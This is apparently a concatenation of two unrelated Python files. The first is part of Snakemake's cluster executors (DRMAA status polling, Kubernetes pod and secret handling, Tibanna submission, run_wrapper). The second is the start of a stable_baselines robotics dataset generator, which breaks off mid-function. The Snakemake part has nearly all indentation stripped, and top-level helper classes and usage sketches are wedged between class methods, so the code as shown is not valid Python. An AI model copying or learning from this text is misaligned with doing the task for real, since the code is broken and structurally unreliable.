logger.warning(
"Job {} (DRMAA id: {}) was suspended by {}.".format(
active_job.job.jobid, active_job.jobid, by
)
)
suspended_msg.add(active_job.job.jobid)
if retval == drmaa.JobState.USER_SUSPENDED:
handle_suspended("user")
elif retval == drmaa.JobState.SYSTEM_SUSPENDED:
handle_suspended("system")
else:
try:
suspended_msg.remove(active_job.job.jobid)
except KeyError:
# there was nothing to remove
pass
with self.lock:
self.active_jobs.extend(still_running)
sleep()
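# A sketch of using the DRMAA backend: native scheduler arguments are passed
# via --drmaa, conventionally quoted with a leading space (values are
# illustrative):
#
#   snakemake --jobs 100 --drmaa " -l h_vmem=4G -pe smp {threads}"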
@contextlib.contextmanager
def change_working_directory(directory=None):
"""Change working directory in execution context if provided."""
if directory:
try:
saved_directory = os.getcwd()
logger.info("Changing to shadow directory: {}".format(directory))
os.chdir(directory)
yield
finally:
os.chdir(saved_directory)
else:
yield
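# Minimal usage sketch for the context manager above (the directory name and
# the called function are illustrative): the working directory is switched only
# if one is given and is restored afterwards, even if the body raises.
#
#   with change_working_directory(".snakemake/shadow/tmpabc123"):
#       run_the_shadowed_job()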
KubernetesJob = namedtuple(
"KubernetesJob", "job jobid callback error_callback kubejob jobscript"
)
class KubernetesExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
namespace,
container_image=None,
jobname="{rulename}.{jobid}",
printreason=False,
quiet=False,
printshellcmds=False,
cluster_config=None,
local_input=None,
restart_times=None,
keepincomplete=False,
):
self.workflow = workflow
super().__init__(
workflow,
dag,
None,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
local_input=local_input,
restart_times=restart_times,
assume_shared_fs=False,
max_status_checks_per_second=10,
disable_envvar_declarations=True,
)
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
try:
from kubernetes import config
except ImportError:
raise WorkflowError(
"The Python 3 package 'kubernetes' "
"must be installed to use Kubernetes"
)
config.load_kube_config()
import kubernetes.client
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.namespace = namespace
self.envvars = workflow.envvars
self.secret_files = {}
self.run_namespace = str(uuid.uuid4())
self.secret_envvars = {}
self.register_secret()
self.container_image = container_image or get_container_image()
logger.info(f"Using {self.container_image} for Kubernetes jobs.")
def get_job_exec_prefix(self, job):
return "cp -rf /source/. ."
def register_secret(self):
import kubernetes.client
secret = kubernetes.client.V1Secret()
secret.metadata = kubernetes.client.V1ObjectMeta()
# create a random uuid
secret.metadata.name = self.run_namespace
secret.type = "Opaque"
secret.data = {}
for i, f in enumerate(self.workflow.get_sources()):
if f.startswith(".."):
logger.warning(
"Ignoring source file {}. Only files relative "
"to the working directory are allowed.".format(f)
)
continue
# The kubernetes API can't create secret files larger than 1MB.
source_file_size = os.path.getsize(f)
max_file_size = 1048576
if source_file_size > max_file_size:
logger.warning(
"Skipping the source file {f}. Its size {source_file_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f, source_file_size=source_file_size
)
)
continue
with open(f, "br") as content:
key = "f{}".format(i)
                # Some files are smaller than 1MB but grow larger after being
                # base64 encoded; we should exclude them as well, otherwise the
                # Kubernetes API will complain.
encoded_contents = base64.b64encode(content.read()).decode()
encoded_size = len(encoded_contents)
if encoded_size > 1048576:
logger.warning(
"Skipping the source file {f} for secret key {key}. "
"Its base64 encoded size {encoded_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f,
source_file_size=source_file_size,
key=key,
encoded_size=encoded_size,
)
)
continue
self.secret_files[key] = f
secret.data[key] = encoded_contents
for e in self.envvars:
try:
key = e.lower()
secret.data[key] = base64.b64encode(os.environ[e].encode()).decode()
self.secret_envvars[key] = e
except KeyError:
continue
# Test if the total size of the configMap exceeds 1MB
config_map_size = sum(
[len(base64.b64decode(v)) for k, v in secret.data.items()]
)
if config_map_size > 1048576:
logger.warning(
"The total size of the included files and other Kubernetes secrets "
"is {}, exceeding the 1MB limit.\n".format(config_map_size)
)
logger.warning(
"The following are the largest files. Consider removing some of them "
"(you need remove at least {} bytes):".format(config_map_size - 1048576)
)
entry_sizes = {
self.secret_files[k]: len(base64.b64decode(v))
for k, v in secret.data.items()
if k in self.secret_files
}
for k, v in sorted(entry_sizes.items(), key=lambda item: item[1])[:-6:-1]:
logger.warning(" * File: {k}, original size: {v}".format(k=k, v=v))
raise WorkflowError("ConfigMap too large")
self.kubeapi.create_namespaced_secret(self.namespace, secret)
def unregister_secret(self):
import kubernetes.client
safe_delete_secret = lambda: self.kubeapi.delete_namespaced_secret(
self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()
)
self._kubernetes_retry(safe_delete_secret)
    # In rare cases, deleting a pod may raise a 404 NotFound error.
def safe_delete_pod(self, jobid, ignore_not_found=True):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
try:
self.kubeapi.delete_namespaced_pod(jobid, self.namespace, body=body)
except kubernetes.client.rest.ApiException as e:
if e.status == 404 and ignore_not_found:
# Can't find the pod. Maybe it's already been
# destroyed. Proceed with a warning message.
logger.warning(
"[WARNING] 404 not found when trying to delete the pod: {jobid}\n"
"[WARNING] Ignore this error\n".format(jobid=jobid)
)
else:
raise e
def shutdown(self):
self.unregister_secret()
super().shutdown()
def cancel(self):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
with self.lock:
for j in self.active_jobs:
func = lambda: self.safe_delete_pod(j.jobid, ignore_not_found=True)
self._kubernetes_retry(func)
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
import kubernetes.client
super()._run(job)
exec_job = self.format_job_exec(job)
# Kubernetes silently does not submit a job if the name is too long;
# therefore, we ensure that it is not longer than snakejob+uuid.
jobid = "snakejob-{}".format(
get_uuid("{}-{}-{}".format(self.run_namespace, job.jobid, job.attempt))
)
body = kubernetes.client.V1Pod()
body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"})
body.metadata.name = jobid
# container
container = kubernetes.client.V1Container(name=jobid)
container.image = self.container_image
container.command = shlex.split("/bin/sh")
container.args = ["-c", exec_job]
container.working_dir = "/workdir"
# mount both the workdir (emptyDir) and the source (secret) volumes;
# a second assignment to volume_mounts would silently drop the first mount
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="workdir", mount_path="/workdir"),
kubernetes.client.V1VolumeMount(name="source", mount_path="/source"),
]
node_selector = {}
if "machine_type" in job.resources.keys():
# Kubernetes labels a node by its instance type using this node_label.
node_selector["node.kubernetes.io/instance-type"] = job.resources[
"machine_type"
]
body.spec = kubernetes.client.V1PodSpec(
containers=[container], node_selector=node_selector
)
# fail on first error
body.spec.restart_policy = "Never"
# source files as a secret volume
# we copy these files to the workdir before executing Snakemake
too_large = [
path
for path in self.secret_files.values()
if os.path.getsize(path) > 1000000
]
if too_large:
raise WorkflowError(
"The following source files exceed the maximum "
"file size (1MB) that can be passed from host to "
"kubernetes. These are likely not source code "
"files. Consider adding them to your "
"remote storage instead or (if software) use "
"Conda packages or container images:\n{}".format("\n".join(too_large))
)
secret_volume = kubernetes.client.V1Volume(name="source")
secret_volume.secret = kubernetes.client.V1SecretVolumeSource()
secret_volume.secret.secret_name = self.run_namespace
secret_volume.secret.items = [
kubernetes.client.V1KeyToPath(key=key, path=path)
for key, path in self.secret_files.items()
]
# workdir as an emptyDir volume of undefined size
workdir_volume = kubernetes.client.V1Volume(name="workdir")
workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource()
body.spec.volumes = [secret_volume, workdir_volume]
# env vars
container.env = []
for key, e in self.secret_envvars.items():
envvar = kubernetes.client.V1EnvVar(name=e)
envvar.value_from = kubernetes.client.V1EnvVarSource()
envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector(
key=key, name=self.run_namespace
)
container.env.append(envvar)
# request resources
container.resources = kubernetes.client.V1ResourceRequirements()
container.resources.requests = {}
container.resources.requests["cpu"] = job.resources["_cores"]
if "mem_mb" in job.resources.keys():
container.resources.requests["memory"] = "{}M".format(
job.resources["mem_mb"]
)
# capabilities
if job.needs_singularity and self.workflow.use_singularity:
# TODO this should work, but it doesn't currently because of
# missing loop devices
# singularity inside docker requires SYS_ADMIN capabilities
# see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc
# container.capabilities = kubernetes.client.V1Capabilities()
# container.capabilities.add = ["SYS_ADMIN",
# "DAC_OVERRIDE",
# "SETUID",
# "SETGID",
# "SYS_CHROOT"]
# Running in privileged mode always works
container.security_context = kubernetes.client.V1SecurityContext(
privileged=True
)
pod = self._kubernetes_retry(
lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)
)
logger.info(
"Get status with:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}".format(jobid=jobid)
)
self.active_jobs.append(
KubernetesJob(job, jobid, callback, error_callback, pod, None)
)
# Sometimes certain k8s requests throw kubernetes.client.rest.ApiException.
# Solving this requires reauthentication, as _kubernetes_retry shows.
# However, reauthentication itself may, under rare conditions, also throw
# errors such as:
# kubernetes.client.exceptions.ApiException: (409), Reason: Conflict
#
# This error does not indicate a problem with the k8s cluster, and users can
# safely ignore it.
def _reauthenticate_and_retry(self, func=None):
import kubernetes
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
logger.info("Trying to reauthenticate")
kubernetes.config.load_kube_config()
subprocess.run(["kubectl", "get", "nodes"])
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
try:
self.register_secret()
except kubernetes.client.rest.ApiException as e:
if e.status == 409 and e.reason == "Conflict":
logger.warning("409 conflict ApiException when registering secrets")
logger.warning(e)
else:
raise WorkflowError(
e,
"This is likely a bug in "
"https://github.com/kubernetes-client/python.",
)
if func:
return func()
def _kubernetes_retry(self, func):
import kubernetes
import urllib3
with self.lock:
try:
return func()
except kubernetes.client.rest.ApiException as e:
if e.status == 401:
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
return self._reauthenticate_and_retry(func)
# Handling timeout that may occur in case of GKE master upgrade
except urllib3.exceptions.MaxRetryError as e:
logger.info(
"Request time out! "
"check your connection to Kubernetes master"
"Workflow will pause for 5 minutes to allow any update operations to complete"
)
time.sleep(300)
try:
return func()
except:
# Still can't reach the server after 5 minutes
raise WorkflowError(
e,
"Error 111 connection timeout, please check"
" that the k8 cluster master is reachable!",
)
def _wait_for_jobs(self):
import kubernetes
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
with self.status_rate_limiter:
logger.debug("Checking status for pod {}".format(j.jobid))
job_not_found = False
try:
res = self._kubernetes_retry(
lambda: self.kubeapi.read_namespaced_pod_status(
j.jobid, self.namespace
)
)
except kubernetes.client.rest.ApiException as e:
if e.status == 404:
# Jobid not found
# The job is likely already done and was deleted on
# the server.
j.callback(j.job)
continue
except WorkflowError as e:
print_exception(e, self.workflow.linemaps)
j.error_callback(j.job)
continue
if res is None:
msg = (
"Unknown pod {jobid}. "
"Has the pod been deleted "
"manually?"
).format(jobid=j.jobid)
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Failed":
msg = (
"For details, please issue:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}"
).format(jobid=j.jobid)
# failed
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Succeeded":
# finished
j.callback(j.job)
func = lambda: self.safe_delete_pod(
j.jobid, ignore_not_found=True
)
self._kubernetes_retry(func)
else:
# still active
still_running.append(j)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
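# A minimal sketch of the retry-and-reauthenticate pattern implemented by
# _kubernetes_retry()/_reauthenticate_and_retry() above. ApiError and the
# reauthenticate callback are hypothetical stand-ins; the real executor catches
# kubernetes.client.rest.ApiException and reloads the kubeconfig on a 401.
class ApiError(Exception):
    def __init__(self, status):
        super().__init__("API error {}".format(status))
        self.status = status

def retry_once_on_401(func, reauthenticate):
    """Call func(); on a 401 response, refresh credentials once and retry."""
    try:
        return func()
    except ApiError as err:
        if err.status != 401:
            raise
        reauthenticate()
        return func()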
TibannaJob = namedtuple(
"TibannaJob", "job jobname jobid exec_arn callback error_callback"
)
class TibannaExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
tibanna_sfn,
precommand="",
tibanna_config=False,
container_image=None,
printreason=False,
quiet=False,
printshellcmds=False,
local_input=None,
restart_times=None,
max_status_checks_per_second=1,
keepincomplete=False,
):
self.workflow = workflow
self.workflow_sources = []
for wfs in workflow.get_sources():
if os.path.isdir(wfs):
for (dirpath, dirnames, filenames) in os.walk(wfs):
self.workflow_sources.extend(
[os.path.join(dirpath, f) for f in filenames]
)
else:
self.workflow_sources.append(os.path.abspath(wfs))
log = "sources="
for f in self.workflow_sources:
log += f
logger.debug(log)
self.snakefile = workflow.main_snakefile
self.envvars = {e: os.environ[e] for e in workflow.envvars}
if self.envvars:
logger.debug("envvars = %s" % str(self.envvars))
self.tibanna_sfn = tibanna_sfn
if precommand:
self.precommand = precommand
else:
self.precommand = ""
self.s3_bucket = workflow.default_remote_prefix.split("/")[0]
self.s3_subdir = re.sub(
"^{}/".format(self.s3_bucket), "", workflow.default_remote_prefix
)
logger.debug("precommand= " + self.precommand)
logger.debug("bucket=" + self.s3_bucket)
logger.debug("subdir=" + self.s3_subdir)
self.quiet = quiet
super().__init__(
workflow,
dag,
cores,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
local_input=local_input,
restart_times=restart_times,
assume_shared_fs=False,
max_status_checks_per_second=max_status_checks_per_second,
disable_default_remote_provider_args=True,
disable_default_resources_args=True,
disable_envvar_declarations=True,
)
self.container_image = container_image or get_container_image()
logger.info(f"Using {self.container_image} for Tibanna jobs.")
self.tibanna_config = tibanna_config
def shutdown(self):
# perform additional steps on shutdown if necessary
logger.debug("shutting down Tibanna executor")
super().shutdown()
def cancel(self):
from tibanna.core import API
for j in self.active_jobs:
logger.info("killing job {}".format(j.jobname))
while True:
try:
res = API().kill(j.exec_arn)
if not self.quiet:
print(res)
break
except KeyboardInterrupt:
pass
self.shutdown()
def split_filename(self, filename, checkdir=None):
f = os.path.abspath(filename)
if checkdir:
checkdir = checkdir.rstrip("/")
if f.startswith(checkdir):
fname = re.sub("^{}/".format(checkdir), "", f)
fdir = checkdir
else:
direrrmsg = (
"All source files including Snakefile, "
+ "conda env files, and rule script files "
+ "must be in the same working directory: {} vs {}"
)
raise WorkflowError(direrrmsg.format(checkdir, f))
else:
fdir, fname = os.path.split(f)
return fname, fdir
def remove_prefix(self, s):
return re.sub("^{}/{}/".format(self.s3_bucket, self.s3_subdir), "", s)
def get_job_targets(self, job):
def handle_target(target):
if isinstance(target, _IOFile) and target.remote_object.provider.is_default:
return self.remove_prefix(target)
else:
return target
return [handle_target(target) for target in job.get_targets()]
def get_snakefile(self):
return os.path.basename(self.snakefile)
def add_command(self, job, tibanna_args, tibanna_config):
# format command
command = self.format_job_exec(job)
if self.precommand:
command = self.precommand + "; " + command
logger.debug("command = " + str(command))
tibanna_args.command = command
def add_workflow_files(self, job, tibanna_args):
snakefile_fname, snakemake_dir = self.split_filename(self.snakefile)
snakemake_child_fnames = []
for src in self.workflow_sources:
src_fname, _ = self.split_filename(src, snakemake_dir)
if src_fname != snakefile_fname: # redundant
snakemake_child_fnames.append(src_fname)
# change path for config files
self.workflow.overwrite_configfiles = [
self.split_filename(cf, snakemake_dir)[0]
for cf in self.workflow.overwrite_configfiles
]
tibanna_args.snakemake_directory_local = snakemake_dir
tibanna_args.snakemake_main_filename = snakefile_fname
tibanna_args.snakemake_child_filenames = list(set(snakemake_child_fnames))
def adjust_filepath(self, f):
if not hasattr(f, "remote_object"):
rel = self.remove_prefix(f) # log/benchmark
elif (
hasattr(f.remote_object, "provider") and f.remote_object.provider.is_default
):
rel = self.remove_prefix(f)
else:
rel = f
return rel
def make_tibanna_input(self, job):
from tibanna import ec2_utils, core as tibanna_core
# input & output
# Local snakemake command here must be run with --default-remote-prefix
# and --default-remote-provider (forced) but on VM these options will be removed.
# The snakemake on the VM will consider these inputs and outputs as not remote.
# The files are transferred to the container by Tibanna before running snakemake.
# In short, the paths on the VM must be consistent with what's in the Snakefile,
# but the actual location of the files is the S3 bucket/prefix.
# This mapping info must be passed to Tibanna.
for i in job.input:
logger.debug("job input " + str(i))
logger.debug("job input is remote= " + ("true" if i.is_remote else "false"))
if hasattr(i.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if i.remote_object.provider.is_default else "false")
)
for o in job.expanded_output:
logger.debug("job output " + str(o))
logger.debug(
"job output is remote= " + ("true" if o.is_remote else "false")
)
if hasattr(o.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if o.remote_object.provider.is_default else "false")
)
file_prefix = (
"file:///data1/snakemake" # working dir inside snakemake container on VM
)
input_source = dict()
for ip in job.input:
ip_rel = self.adjust_filepath(ip)
input_source[os.path.join(file_prefix, ip_rel)] = "s3://" + ip
output_target = dict()
output_all = [eo for eo in job.expanded_output]
if job.log:
if isinstance(job.log, list):
output_all.extend([str(_) for _ in job.log])
else:
output_all.append(str(job.log))
if hasattr(job, "benchmark") and job.benchmark:
if isinstance(job.benchmark, list):
output_all.extend([str(_) for _ in job.benchmark])
else:
output_all.append(str(job.benchmark))
for op in output_all:
op_rel = self.adjust_filepath(op)
output_target[os.path.join(file_prefix, op_rel)] = "s3://" + op
# mem & cpu
mem = job.resources["mem_mb"] / 1024 if "mem_mb" in job.resources.keys() else 1
cpu = job.threads
# jobid, grouping, run_name
jobid = tibanna_core.create_jobid()
if job.is_group():
run_name = "snakemake-job-%s-group-%s" % (str(jobid), str(job.groupid))
else:
run_name = "snakemake-job-%s-rule-%s" % (str(jobid), str(job.rule))
# tibanna input
tibanna_config = {
"run_name": run_name,
"mem": mem,
"cpu": cpu,
"ebs_size": math.ceil(job.resources["disk_mb"] / 1024),
"log_bucket": self.s3_bucket,
}
logger.debug("additional tibanna config: " + str(self.tibanna_config))
if self.tibanna_config:
tibanna_config.update(self.tibanna_config)
tibanna_args = ec2_utils.Args(
output_S3_bucket=self.s3_bucket,
language="snakemake",
container_image=self.container_image,
input_files=input_source,
output_target=output_target,
input_env=self.envvars,
)
self.add_workflow_files(job, tibanna_args)
self.add_command(job, tibanna_args, tibanna_config)
tibanna_input = {
"jobid": jobid,
"config": tibanna_config,
"args": tibanna_args.as_dict(),
}
logger.debug(json.dumps(tibanna_input, indent=4))
return tibanna_input
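# A worked example (hypothetical bucket and prefix) of the mapping built by
# make_tibanna_input() above: on the VM the files live under file:///data1/snakemake,
# while the data itself sits under the default remote prefix on S3, and
# remove_prefix() strips "<bucket>/<subdir>/" to obtain the Snakefile-relative path.
#
#   s3_bucket, s3_subdir = "mybucket", "runs/2021"
#   ip = "mybucket/runs/2021/data/input.txt"
#   ip_rel = re.sub("^{}/{}/".format(s3_bucket, s3_subdir), "", ip)  # "data/input.txt"
#   os.path.join("file:///data1/snakemake", ip_rel)
#   # -> "file:///data1/snakemake/data/input.txt" maps to "s3://mybucket/runs/2021/data/input.txt"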
def run(self, job, callback=None, submit_callback=None, error_callback=None):
logger.info("running job using Tibanna...")
from tibanna.core import API
super()._run(job)
# submit job here, and obtain job ids from the backend
tibanna_input = self.make_tibanna_input(job)
jobid = tibanna_input["jobid"]
exec_info = API().run_workflow(
tibanna_input,
sfn=self.tibanna_sfn,
verbose=not self.quiet,
jobid=jobid,
open_browser=False,
sleep=0,
)
exec_arn = exec_info.get("_tibanna", {}).get("exec_arn", "")
jobname = tibanna_input["config"]["run_name"]
jobid = tibanna_input["jobid"]
# register job as active, using your own namedtuple.
# The namedtuple must at least contain the attributes
# job, jobid, callback, error_callback.
self.active_jobs.append(
TibannaJob(job, jobname, jobid, exec_arn, callback, error_callback)
)
def _wait_for_jobs(self):
# busy wait on job completion
# This is only needed if your backend does not allow using callbacks
# for obtaining job status.
from tibanna.core import API
while True:
# always use self.lock to avoid race conditions
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
# use self.status_rate_limiter to avoid too many API calls.
with self.status_rate_limiter:
if j.exec_arn:
status = API().check_status(j.exec_arn)
else:
status = "FAILED_AT_SUBMISSION"
if not self.quiet or status != "RUNNING":
logger.debug("job %s: %s" % (j.jobname, status))
if status == "RUNNING":
still_running.append(j)
elif status == "SUCCEEDED":
j.callback(j.job)
else:
j.error_callback(j.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
def run_wrapper(
job_rule,
input,
output,
params,
wildcards,
threads,
resources,
log,
benchmark,
benchmark_repeats,
conda_env,
container_img,
singularity_args,
env_modules,
use_singularity,
linemaps,
debug,
cleanup_scripts,
shadow_dir,
jobid,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
):
"""
Wrapper around the run method that handles exceptions and benchmarking.
Arguments
job_rule -- the ``job.rule`` member
input -- a list of input files
output -- a list of output files
wildcards -- so far processed wildcards
threads -- usable threads
log -- a list of log files
shadow_dir -- optional shadow directory root
"""
# get shortcuts to job_rule members
run = job_rule.run_func
version = job_rule.version
rule = job_rule.name
is_shell = job_rule.shellcmd is not None
if os.name == "posix" and debug:
sys.stdin = open("/dev/stdin")
if benchmark is not None:
from snakemake.benchmark import (
BenchmarkRecord,
benchmarked,
write_benchmark_records,
)
# Change workdir if shadow defined and not using singularity.
# Otherwise, we do the change from inside the container.
passed_shadow_dir = None
if use_singularity and container_img:
passed_shadow_dir = shadow_dir
shadow_dir = None
try:
with change_working_directory(shadow_dir):
if benchmark:
bench_records = []
for bench_iteration in range(benchmark_repeats):
# Determine whether to benchmark in this process or in the executed
# child process. We benchmark in this process unless the
# execution is done through the ``shell:``, ``script:``, or
# ``wrapper:`` stanza.
is_sub = (
job_rule.shellcmd
or job_rule.script
or job_rule.wrapper
or job_rule.cwl
)
if is_sub:
# The benchmarking through ``benchmarked()`` is started
# in the execution of the shell fragment, script, wrapper
# etc, as the child PID is available there.
bench_record = BenchmarkRecord()
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
else:
# The benchmarking is started here as we have a run section
# and the generated Python function is executed in this
# process' thread.
with benchmarked() as bench_record:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
# Store benchmark record for this iteration
bench_records.append(bench_record)
else:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
None,
jobid,
is_shell,
None,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
except (KeyboardInterrupt, SystemExit) as e:
# Re-raise the keyboard interrupt in order to record an error in the
# scheduler but ignore it
raise e
except (Exception, BaseException) as ex:
# this ensures that exception can be re-raised in the parent thread
origin = get_exception_origin(ex, linemaps)
if origin is not None:
log_verbose_traceback(ex)
lineno, file = origin
raise RuleException(
format_error(
ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True
)
)
else:
# some internal bug, just reraise
raise ex
if benchmark is not None:
try:
write_benchmark_records(bench_records, benchmark)
except (Exception, BaseException) as ex:
raise WorkflowError(ex)
|
dataset_generator.py
|
from __future__ import division, absolute_import, print_function
import argparse
import glob
import multiprocessing
import os
import shutil
import time
import numpy as np
from stable_baselines import PPO2
from stable_baselines.common.vec_env import DummyVecEnv, VecNormalize
from stable_baselines.common.policies import CnnPolicy
from environments import ThreadingType
from environments.registry import registered_env
from real_robots.constants import USING_OMNIROBOT
from srl_zoo.utils import printRed, printYellow
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # used to remove debug info of tensorflow
def convertImagePath(args, path, record_id_start):
"""
Convert an image path from a part folder to its location in the fused dataset
:param args: (ArgumentParser object)
:param path: (str) original image path
:param record_id_start: (int) the record index at which the current part starts counting
:return: (str) the converted image path
"""
image_name = path.split("/")[-1]
# get record id for output, by adding the current offset with the record_id
# of the folder
new_record_id = record_id_start + int(path.split("/")[-2].split("_")[-1])
return args.name + "/record_{:03d}".format(new_record_id) + "/" + image_name
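# A short usage example for convertImagePath() with a hypothetical dataset name and
# path: the record index inside a part is shifted by the part's starting record id.
from argparse import Namespace

_example_args = Namespace(name="kuka_button")
_example_path = "srl_zoo/data/kuka_button_part-1/record_002/frame000.jpg"
# record_002 within this part, offset by 10 -> record_012 in the fused dataset
assert convertImagePath(_example_args, _example_path, record_id_start=10) == \
    "kuka_button/record_012/frame000.jpg"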
def env_thread(args, thread_num, partition=True, use_ppo2=False, img_shape=None):
"""
Run a session of an environment
:param args: (ArgumentParser object)
:param thread_num: (int) The thread ID of the environment session
:param partition: (bool) If the output should be in multiple parts (default=True)
:param use_ppo2: (bool) Use ppo2 to generate the dataset
:param img_shape: (tuple or None) image shape to pass to the environment
"""
env_kwargs = {
"max_distance": args.max_distance,
"random_target": args.random_target,
"force_down": True,
"is_discrete": not args.continuous_actions,
"renders": thread_num == 0 and args.display,
"record_data": not args.no_record_data,
"multi_view": args.multi_view,
"save_path": args.save_path,
"shape_reward": args.shape_reward
}
if partition:
env_kwargs["name"] = args.name + "_part-" + str(thread_num)
else:
env_kwargs["name"] = args.name
env_class = registered_env[args.env][0]
env_kwargs["img_shape"] = img_shape #(3, 224, 224)
env = env_class(**env_kwargs)
using_real_omnibot = args.env == "OmnirobotEnv-v0" and USING_OMNIROBOT
model = None
if use_ppo2:
# Additional env when using a trained ppo agent to generate data
# instead of a random agent
train_env = env_class(**{**env_kwargs, "record_data": False, "renders": False})
train_env = DummyVecEnv([lambda: train_env])
train_env = VecNormalize(train_env, norm_obs=True, norm_reward=False)
model = PPO2(CnnPolicy, train_env).learn(args.ppo2_timesteps)
frames = 0
start_time = time.time()
# divide evenly, then do an extra one for only some of them in order to get the right count
for i_episode in range(args.num_episode // args.num_cpu + 1 * (args.num_episode % args.num_cpu > thread_num)):
# seed + position in this slice + size of slice (with remainder if uneven partitions)
seed = args.seed + i_episode + args.num_episode // args.num_cpu * thread_num + \
(thread_num if thread_num <= args.num_episode % args.num_cpu else args.num_episode % args.num_cpu)
env.seed(seed)
seed = seed%2**32
try:
## for gym environment
env.action_space.seed(seed) # this is for the sample() function from gym.space
except:
pass
obs = env.reset()
done = False
t = 0
episode_toward_target_on = False
while not done:
env.render()
if use_ppo2:
action, _ = model.predict([obs])
else:
# Using a target reaching policy (untrained, from camera) when collecting data from real OmniRobot
if episode_toward_target_on and np.random.rand() < args.toward_target_timesteps_proportion and \
using_real_omnibot:
action = [env.actionPolicyTowardTarget()]
else:
action = [env.action_space.sample()]
action_to_step = action[0]
_, _, done, _ = env.step(action_to_step)
frames += 1
t += 1
if done:
if np.random.rand() < args.toward_target_timesteps_proportion and using_real_omnibot:
episode_toward_target_on = True
else:
episode_toward_target_on = False
print("Episode finished after {} timesteps".format(t + 1))
if thread_num == 0:
print("{:.2f} FPS".format(frames * args.num_cpu / (time.time() - start_time)))
def main():
parser = argparse.ArgumentParser(description='Deterministic dataset generator for SRL training ' +
'(can be used for environment testing)')
parser.add_argument('--num-cpu', type=int, default=1, help='number of cpu to run on')
parser.add_argument('--num-episode', type=int, default=50, help='number of episode to run')
parser.add_argument('--save-path', type=str, default='srl_zoo/data/',
help='Folder where the environments will save the output')
parser.add_argument('--name', type=str, default='kuka_button', help='Folder name for the output')
parser.add_argument('--env', type=str, default='KukaButtonGymEnv-v0', help='The environment wanted',
choices=list(registered_env.keys()))
parser.add_argument('--display', action='store_true', default=False)
parser.add_argument('--no-record-data', action='store_true', default=False)
parser.add_argument('--max-distance', type=float, default=0.28,
help='Beyond this distance from the goal, the agent gets a negative reward')
parser.add_argument('-c', '--continuous-actions', action='store_true', default=False)
parser.add_argument('--seed', type=int, default=0, help='the seed')
parser.add_argument('-f', '--force', action='store_true', default=False,
help='Force the save, even if it overrides something else,' +
' including partial parts if they exist')
parser.add_argument('-r', '--random-target', action='store_true', default=False,
help='Set the button to a random position')
parser.add_argument('--multi-view', action='store_true', default=False, help='Set a second camera to the scene')
parser.add_argument('--shape-reward', action='store_true', default=False,
help='Shape the reward (reward = - distance) instead of a sparse reward')
parser.add_argument('--reward-dist', action='store_true', default=False,
help='Prints out the reward distribution when the dataset generation is finished')
parser.add_argument('--run-ppo2', action='store_true', default=False,
help='runs a ppo2 agent instead of a random agent')
parser.add_argument('--ppo2-timesteps', type=int, default=1000,
help='number of timesteps to run PPO2 on before generating the dataset')
parser.add_argument('--toward-target-timesteps-proportion', type=float, default=0.0,
help="propotion of timesteps that use simply towards target policy, should be 0.0 to 1.0")
parser.add_argument('--img-shape', type=str, default="(3,128,128)",
help='image shape (default "(3,128,128)")')
args = parser.parse_args()
assert (args.num_cpu > 0), "Error: number of cpu must be positive and non zero"
assert (args.max_distance > 0), "Error: max distance must be positive and non zero"
assert (args.num_episode > 0), "Error: number of episodes must be positive and non zero"
assert not args.reward_dist or not args.shape_reward, \
"Error: cannot display the reward distribution for continuous reward"
assert not(registered_env[args.env][3] is ThreadingType.NONE and args.num_cpu != 1), \
"Error: cannot have more than 1 CPU for the environment {}".format(args.env)
